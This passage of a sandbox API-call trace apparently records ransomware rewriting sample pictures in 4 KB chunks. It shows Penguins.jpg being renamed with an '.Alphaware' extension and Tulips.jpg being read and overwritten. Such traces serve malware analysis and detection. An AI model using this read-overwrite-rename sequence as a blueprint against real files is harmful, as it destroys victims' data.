lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.432] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.433] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.433] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.433] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.433] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.434] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.434] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.434] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.434] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.435] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.435] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.435] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.435] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.436] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.436] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.436] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.437] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.437] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.437] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.437] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.439] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.439] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.439] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.439] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.440] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.440] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.440] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.440] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.441] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.441] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.441] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.441] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.442] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.442] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.442] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.442] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.443] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.443] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.443] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.443] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.444] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.444] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.444] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.444] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.445] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.445] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.445] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.445] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.446] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.446] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.446] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.446] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.447] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.447] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.447] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.447] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.447] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.448] WriteFile (in: hFile=0x260, lpBuffer=0x241f9f0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x241f9f0*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0102.456] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f41c580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xfd408)) returned 1 [0102.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0102.456] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.Alphaware" (normalized: "c:\\users\\public\\pictures\\sample pictures\\penguins.jpg.alphaware")) returned 1 [0102.469] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", dwFileAttributes=0x80) returned 1 [0102.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0102.470] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2420eb8 | out: lpFileInformation=0x2420eb8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958)) returned 1 [0102.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0102.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0102.470] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0102.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0102.470] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x97958 [0102.486] ReadFile (in: hFile=0x260, lpBuffer=0x12640ba8, nNumberOfBytesToRead=0x97958, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12640ba8*, lpNumberOfBytesRead=0x23ea98*=0x97958, lpOverlapped=0x0) returned 1 [0102.606] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", nBufferLength=0x105, lpBuffer=0x23e400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", lpFilePart=0x0) returned 0x33 [0102.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0102.607] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0102.614] GetFileType (hFile=0x260) returned 0x1 [0102.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0102.614] GetFileType (hFile=0x260) returned 0x1 [0102.615] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.616] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.616] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.617] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.617] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.617] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.618] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.618] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.618] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.619] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.619] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.620] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.620] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.620] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.620] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.621] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.621] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.621] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.622] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.622] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.622] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.623] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.623] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.623] WriteFile (in: hFile=0x260, lpBuffer=0x23c5b50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23c5b50*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0102.624] WriteFile (in: hFile=0x260, 